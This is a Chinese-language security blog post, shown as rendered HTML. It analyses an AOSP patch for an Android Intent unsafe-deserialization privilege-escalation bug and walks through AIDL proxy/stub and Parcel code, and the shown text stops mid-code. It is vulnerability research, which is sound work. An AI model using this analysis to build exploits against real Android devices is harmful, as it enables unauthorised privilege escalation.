<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="light">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="Creator Mismatch" />
<meta property="og:locale" content="en" />
<meta name="description" content="Prologue" />
<meta property="og:description" content="Prologue" />
<link rel="canonical" href="https://konata.github.io/posts/creator-mismatch/" />
<meta property="og:url" content="https://konata.github.io/posts/creator-mismatch/" />
<meta property="og:site_name" content="开元米粉实力代购" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2023-08-17T00:00:00+08:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Creator Mismatch" />
<meta name="twitter:site" content="@minamikazecafe" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-05-16T18:56:11+08:00","datePublished":"2023-08-17T00:00:00+08:00","description":"Prologue","headline":"Creator Mismatch","mainEntityOfPage":{"@type":"WebPage","@id":"https://konata.github.io/posts/creator-mismatch/"},"url":"https://konata.github.io/posts/creator-mismatch/"}</script>
<!-- End Jekyll SEO tag -->


  <title>Creator Mismatch | 开元米粉实力代购
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="开元米粉实力代购">
<meta name="application-name" content="开元米粉实力代购">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.6/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="https://avatars.githubusercontent.com/u/227627?v=4" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">开元米粉实力代购</a>
    <p class="site-subtitle fst-italic mb-0">納めましょう妄想税</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    

    
      

      
        <a
          href="https://github.com/konata"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
      

      
        <a
          href="https://twitter.com/minamikazecafe"
          aria-label="twitter"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-twitter"></i>
        </a>
      
    
      

      
        <a
          href="javascript:location.href = 'mailto:' + ['minamikazecafe','gmail.com'].join('@')"
          aria-label="email"
          

          

          

          
        >
          <i class="fas fa-envelope"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" class="flex-shrink-0" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Home</a>
            </span>

          
        
          
        
          
            
              <span>Creator Mismatch</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link" aria-label="Sidebar">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link" aria-label="Search">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  




<!-- return -->










<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>Creator Mismatch</h1>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1692201600"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Aug 17, 2023
</time>

      </span>

      <!-- lastmod date -->
      
        <span>
          Updated
          <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1747392971"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  May 16, 2025
</time>

        </span>
      

      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              <a href="https://twitter.com/minamikazecafe">natsuki</a>
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="4528 words"
>
  <em>25 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">Creator Mismatch</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">Creator Mismatch</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <h2 id="prologue"><span class="me-2">Prologue</span><a href="#prologue" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>今年年初的时候， AOSP 公布了一个看起来很奇怪的 <a href="https://android.googlesource.com/platform/frameworks/base/+/d0bc9026e2e62e09fa88c1bcbf1dc1c3fb001375%5E%21/#F0">patch</a></p>

<div class="language-java highlighter-rouge"><div class="code-header">
        <span data-label-text="Java"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre>   <span class="kd">final</span> <span class="nc">Intent</span> <span class="n">intent</span> <span class="o">=</span> <span class="o">(</span><span class="nc">Intent</span><span class="o">)</span><span class="n">accountManagerResult</span><span class="o">.</span><span class="na">getParcelable</span><span class="o">(</span><span class="nc">AccountManager</span><span class="o">.</span><span class="na">KEY_INTENT</span><span class="o">);</span>
   <span class="k">if</span> <span class="o">(</span><span class="n">intent</span> <span class="o">!=</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span>
     <span class="n">mPendingRequest</span> <span class="o">=</span> <span class="no">REQUEST_ADD_ACCOUNT</span><span class="o">;</span>
     <span class="n">mExistingAccounts</span> <span class="o">=</span> <span class="nc">AccountManager</span><span class="o">.</span><span class="na">get</span><span class="o">(</span><span class="k">this</span><span class="o">).</span><span class="na">getAccountsForPackage</span><span class="o">(</span><span class="n">mCallingPackage</span><span class="o">,</span> <span class="n">mCallingUid</span><span class="o">);</span>
     <span class="n">intent</span><span class="o">.</span><span class="na">setFlags</span><span class="o">(</span><span class="n">intent</span><span class="o">.</span><span class="na">getFlags</span><span class="o">()</span> <span class="o">&amp;</span> <span class="o">~</span><span class="nc">Intent</span><span class="o">.</span><span class="na">FLAG_ACTIVITY_NEW_TASK</span><span class="o">);</span>
<span class="o">-</span>    <span class="n">startActivityForResult</span><span class="o">(</span><span class="n">intent</span><span class="o">,</span> <span class="no">REQUEST_ADD_ACCOUNT</span><span class="o">);</span>
<span class="o">+</span>    <span class="n">startActivityForResult</span><span class="o">(</span><span class="k">new</span> <span class="nc">Intent</span><span class="o">(</span><span class="n">intent</span><span class="o">),</span> <span class="no">REQUEST_ADD_ACCOUNT</span><span class="o">);</span>
     <span class="k">return</span><span class="o">;</span>
   <span class="o">}</span>
</pre></td></tr></tbody></table></code></div></div>

<p>观察 Intent 的构造函数，除了每个字段逐个赋值外并没有额外的操作，这代码看起来在夏姬八写, 再从其他地方看一下漏洞描述，只有简单的说是和 Unsafe Deserialization 相关的越权，也没有更深的线索， 注意到关键字 <code class="language-plaintext highlighter-rouge">序列化</code>，<code class="language-plaintext highlighter-rouge">越权</code>，那么可以跟到 AIDL 调用处理的位置看看</p>

<h2 id="aidl"><span class="me-2">AIDL</span><a href="#aidl" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>startActivityForResult 到最后和服务端的交互是通过 IActivityTaskManager.startActivity, 即<a href="https://cs.android.com/android/platform/superproject/main/+/main:out/soong/.intermediates/frameworks/base/framework-minus-apex-intdefs/android_common/xref36/srcjars.xref/android/app/IActivityTaskManager.java;drc=47fffdd53115a9af1820e3f89d8108745be4b55d;l=2032">这里</a></p>

<div class="language-java highlighter-rouge"><div class="code-header">
        <span data-label-text="Java"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
</pre></td><td class="rouge-code"><pre>      <span class="c1">// Proxy</span>
      <span class="nd">@Override</span> <span class="kd">public</span> <span class="kt">int</span> <span class="nf">startActivity</span><span class="o">(</span><span class="n">android</span><span class="o">.</span><span class="na">app</span><span class="o">.</span><span class="na">IApplicationThread</span> <span class="n">caller</span><span class="o">,</span> <span class="n">java</span><span class="o">.</span><span class="na">lang</span><span class="o">.</span><span class="na">String</span> <span class="n">callingPackage</span><span class="o">,</span> <span class="n">java</span><span class="o">.</span><span class="na">lang</span><span class="o">.</span><span class="na">String</span> <span class="n">callingFeatureId</span><span class="o">,</span> <span class="n">android</span><span class="o">.</span><span class="na">content</span><span class="o">.</span><span class="na">Intent</span> <span class="n">intent</span><span class="o">,</span> <span class="n">java</span><span class="o">.</span><span class="na">lang</span><span class="o">.</span><span class="na">String</span> <span class="n">resolvedType</span><span class="o">,</span> <span class="n">android</span><span class="o">.</span><span class="na">os</span><span class="o">.</span><span class="na">IBinder</span> <span class="n">resultTo</span><span class="o">,</span> <span class="n">java</span><span class="o">.</span><span class="na">lang</span><span class="o">.</span><span class="na">String</span> <span class="n">resultWho</span><span class="o">,</span> <span class="kt">int</span> <span class="n">requestCode</span><span class="o">,</span> <span class="kt">int</span> <span class="n">flags</span><span class="o">,</span> <span class="n">android</span><span class="o">.</span><span class="na">app</span><span class="o">.</span><span class="na">ProfilerInfo</span> <span class="n">profilerInfo</span><span class="o">,</span> <span class="n">android</span><span class="o">.</span><span class="na">os</span><span class="o">.</span><span class="na">Bundle</span> <span class="n">options</span><span class="o">)</span> <span class="kd">throws</span> <span class="n">android</span><span class="o">.</span><span class="na">os</span><span class="o">.</span><span class="na">RemoteException</span>
      <span class="o">{</span>
        <span class="n">android</span><span class="o">.</span><span class="na">os</span><span class="o">.</span><span class="na">Parcel</span> <span class="n">_data</span> <span class="o">=</span> <span class="n">android</span><span class="o">.</span><span class="na">os</span><span class="o">.</span><span class="na">Parcel</span><span class="o">.</span><span class="na">obtain</span><span class="o">(</span><span class="n">asBinder</span><span class="o">());</span>
        <span class="n">android</span><span class="o">.</span><span class="na">os</span><span class="o">.</span><span class="na">Parcel</span> <span class="n">_reply</span> <span class="o">=</span> <span class="n">android</span><span class="o">.</span><span class="na">os</span><span class="o">.</span><span class="na">Parcel</span><span class="o">.</span><span class="na">obtain</span><span class="o">();</span>
        <span class="kt">int</span> <span class="n">_result</span><span class="o">;</span>
        <span class="k">try</span> <span class="o">{</span>
          <span class="n">_data</span><span class="o">.</span><span class="na">writeInterfaceToken</span><span class="o">(</span><span class="no">DESCRIPTOR</span><span class="o">);</span>
          <span class="n">_data</span><span class="o">.</span><span class="na">writeStrongInterface</span><span class="o">(</span><span class="n">caller</span><span class="o">);</span>
          <span class="n">_data</span><span class="o">.</span><span class="na">writeString</span><span class="o">(</span><span class="n">callingPackage</span><span class="o">);</span>
          <span class="n">_data</span><span class="o">.</span><span class="na">writeString</span><span class="o">(</span><span class="n">callingFeatureId</span><span class="o">);</span>

          <span class="c1">// ⬇️</span>
          <span class="n">_data</span><span class="o">.</span><span class="na">writeTypedObject</span><span class="o">(</span><span class="n">intent</span><span class="o">,</span> <span class="mi">0</span><span class="o">);</span>
          <span class="c1">// ⬆️</span>

          <span class="n">_data</span><span class="o">.</span><span class="na">writeString</span><span class="o">(</span><span class="n">resolvedType</span><span class="o">);</span>
          <span class="n">_data</span><span class="o">.</span><span class="na">writeStrongBinder</span><span class="o">(</span><span class="n">resultTo</span><span class="o">);</span>
          <span class="n">_data</span><span class="o">.</span><span class="na">writeString</span><span class="o">(</span><span class="n">resultWho</span><span class="o">);</span>
          <span class="n">_data</span><span class="o">.</span><span class="na">writeInt</span><span class="o">(</span><span class="n">requestCode</span><span class="o">);</span>
          <span class="n">_data</span><span class="o">.</span><span class="na">writeInt</span><span class="o">(</span><span class="n">flags</span><span class="o">);</span>
          <span class="n">_data</span><span class="o">.</span><span class="na">writeTypedObject</span><span class="o">(</span><span class="n">profilerInfo</span><span class="o">,</span> <span class="mi">0</span><span class="o">);</span>
          <span class="n">_data</span><span class="o">.</span><span class="na">writeTypedObject</span><span class="o">(</span><span class="n">options</span><span class="o">,</span> <span class="mi">0</span><span class="o">);</span>
          <span class="kt">boolean</span> <span class="n">_status</span> <span class="o">=</span> <span class="n">mRemote</span><span class="o">.</span><span class="na">transact</span><span class="o">(</span><span class="nc">Stub</span><span class="o">.</span><span class="na">TRANSACTION_startActivity</span><span class="o">,</span> <span class="n">_data</span><span class="o">,</span> <span class="n">_reply</span><span class="o">,</span> <span class="mi">0</span><span class="o">);</span>
          <span class="n">_reply</span><span class="o">.</span><span class="na">readException</span><span class="o">();</span>
          <span class="n">_result</span> <span class="o">=</span> <span class="n">_reply</span><span class="o">.</span><span class="na">readInt</span><span class="o">();</span>
        <span class="o">}</span>
        <span class="k">finally</span> <span class="o">{</span>
          <span class="n">_reply</span><span class="o">.</span><span class="na">recycle</span><span class="o">();</span>
          <span class="n">_data</span><span class="o">.</span><span class="na">recycle</span><span class="o">();</span>
        <span class="o">}</span>
        <span class="k">return</span> <span class="n">_result</span><span class="o">;</span>
      <span class="o">}</span>


     <span class="c1">// Stub.onTransact</span>
     <span class="k">case</span> <span class="nl">TRANSACTION_startActivity:</span>
        <span class="o">{</span>
          <span class="n">android</span><span class="o">.</span><span class="na">app</span><span class="o">.</span><span class="na">IApplicationThread</span> <span class="n">_arg0</span><span class="o">;</span>
          <span class="n">_arg0</span> <span class="o">=</span> <span class="n">android</span><span class="o">.</span><span class="na">app</span><span class="o">.</span><span class="na">IApplicationThread</span><span class="o">.</span><span class="na">Stub</span><span class="o">.</span><span class="na">asInterface</span><span class="o">(</span><span class="n">data</span><span class="o">.</span><span class="na">readStrongBinder</span><span class="o">());</span>
          <span class="n">java</span><span class="o">.</span><span class="na">lang</span><span class="o">.</span><span class="na">String</span> <span class="n">_arg1</span><span class="o">;</span>
          <span class="n">_arg1</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="na">readString</span><span class="o">();</span>
          <span class="n">java</span><span class="o">.</span><span class="na">lang</span><span class="o">.</span><span class="na">String</span> <span class="n">_arg2</span><span class="o">;</span>
          <span class="n">_arg2</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="na">readString</span><span class="o">();</span>
          <span class="n">android</span><span class="o">.</span><span class="na">content</span><span class="o">.</span><span class="na">Intent</span> <span class="n">_arg3</span><span class="o">;</span>

          <span class="c1">// ⬇️</span>
          <span class="n">_arg3</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="na">readTypedObject</span><span class="o">(</span><span class="n">android</span><span class="o">.</span><span class="na">content</span><span class="o">.</span><span class="na">Intent</span><span class="o">.</span><span class="na">CREATOR</span><span class="o">);</span>
          <span class="c1">// ⬆️</span>

          <span class="n">java</span><span class="o">.</span><span class="na">lang</span><span class="o">.</span><span class="na">String</span> <span class="n">_arg4</span><span class="o">;</span>
          <span class="n">_arg4</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="na">readString</span><span class="o">();</span>
          <span class="n">android</span><span class="o">.</span><span class="na">os</span><span class="o">.</span><span class="na">IBinder</span> <span class="n">_arg5</span><span class="o">;</span>
          <span class="n">_arg5</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="na">readStrongBinder</span><span class="o">();</span>
          <span class="n">java</span><span class="o">.</span><span class="na">lang</span><span class="o">.</span><span class="na">String</span> <span class="n">_arg6</span><span class="o">;</span>
          <span class="n">_arg6</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="na">readString</span><span class="o">();</span>
          <span class="kt">int</span> <span class="n">_arg7</span><span class="o">;</span>
          <span class="n">_arg7</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="na">readInt</span><span class="o">();</span>
          <span class="kt">int</span> <span class="n">_arg8</span><span class="o">;</span>
          <span class="n">_arg8</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="na">readInt</span><span class="o">();</span>
          <span class="n">android</span><span class="o">.</span><span class="na">app</span><span class="o">.</span><span class="na">ProfilerInfo</span> <span class="n">_arg9</span><span class="o">;</span>
          <span class="n">_arg9</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="na">readTypedObject</span><span class="o">(</span><span class="n">android</span><span class="o">.</span><span class="na">app</span><span class="o">.</span><span class="na">ProfilerInfo</span><span class="o">.</span><span class="na">CREATOR</span><span class="o">);</span>
          <span class="n">android</span><span class="o">.</span><span class="na">os</span><span class="o">.</span><span class="na">Bundle</span> <span class="n">_arg10</span><span class="o">;</span>
          <span class="n">_arg10</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="na">readTypedObject</span><span class="o">(</span><span class="n">android</span><span class="o">.</span><span class="na">os</span><span class="o">.</span><span class="na">Bundle</span><span class="o">.</span><span class="na">CREATOR</span><span class="o">);</span>
          <span class="n">data</span><span class="o">.</span><span class="na">enforceNoDataAvail</span><span class="o">();</span>
          <span class="kt">int</span> <span class="n">_result</span> <span class="o">=</span> <span class="k">this</span><span class="o">.</span><span class="na">startActivity</span><span class="o">(</span><span class="n">_arg0</span><span class="o">,</span> <span class="n">_arg1</span><span class="o">,</span> <span class="n">_arg2</span><span class="o">,</span> <span class="n">_arg3</span><span class="o">,</span> <span class="n">_arg4</span><span class="o">,</span> <span class="n">_arg5</span><span class="o">,</span> <span class="n">_arg6</span><span class="o">,</span> <span class="n">_arg7</span><span class="o">,</span> <span class="n">_arg8</span><span class="o">,</span> <span class="n">_arg9</span><span class="o">,</span> <span class="n">_arg10</span><span class="o">);</span>
          <span class="n">reply</span><span class="o">.</span><span class="na">writeNoException</span><span class="o">();</span>
          <span class="n">reply</span><span class="o">.</span><span class="na">writeInt</span><span class="o">(</span><span class="n">_result</span><span class="o">);</span>
          <span class="k">break</span><span class="o">;</span>
        <span class="o">}</span>
</pre></td></tr></tbody></table></code></div></div>

<div class="language-java highlighter-rouge"><div class="code-header">
        <span data-label-text="Java"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre></td><td class="rouge-code"><pre>   <span class="kd">public</span> <span class="kd">final</span> <span class="o">&lt;</span><span class="no">T</span> <span class="kd">extends</span> <span class="nc">Parcelable</span><span class="o">&gt;</span> <span class="kt">void</span> <span class="nf">writeTypedObject</span><span class="o">(</span><span class="nd">@Nullable</span> <span class="no">T</span> <span class="n">val</span><span class="o">,</span>
            <span class="kt">int</span> <span class="n">parcelableFlags</span><span class="o">)</span> <span class="o">{</span>
        <span class="k">if</span> <span class="o">(</span><span class="n">val</span> <span class="o">!=</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span>
            <span class="n">writeInt</span><span class="o">(</span><span class="mi">1</span><span class="o">);</span>

            <span class="c1">// ⬇️</span>
            <span class="n">val</span><span class="o">.</span><span class="na">writeToParcel</span><span class="o">(</span><span class="k">this</span><span class="o">,</span> <span class="n">parcelableFlags</span><span class="o">);</span>
            <span class="c1">// ⬆️</span>

        <span class="o">}</span> <span class="k">else</span> <span class="o">{</span>
            <span class="n">writeInt</span><span class="o">(</span><span class="mi">0</span><span class="o">);</span>
        <span class="o">}</span>
    <span class="o">}</span>

    <span class="kd">public</span> <span class="kd">final</span> <span class="o">&lt;</span><span class="no">T</span><span class="o">&gt;</span> <span class="no">T</span> <span class="nf">readTypedObject</span><span class="o">(</span><span class="nd">@NonNull</span> <span class="nc">Parcelable</span><span class="o">.</span><span class="na">Creator</span><span class="o">&lt;</span><span class="no">T</span><span class="o">&gt;</span> <span class="n">c</span><span class="o">)</span> <span class="o">{</span>
        <span class="k">if</span> <span class="o">(</span><span class="n">readInt</span><span class="o">()</span> <span class="o">!=</span> <span class="mi">0</span><span class="o">)</span> <span class="o">{</span>

          <span class="c1">// ⬇️</span>
          <span class="k">return</span> <span class="n">c</span><span class="o">.</span><span class="na">createFromParcel</span><span class="o">(</span><span class="k">this</span><span class="o">);</span>
          <span class="c1">// ⬆️</span>

        <span class="o">}</span> <span class="k">else</span> <span class="o">{</span>
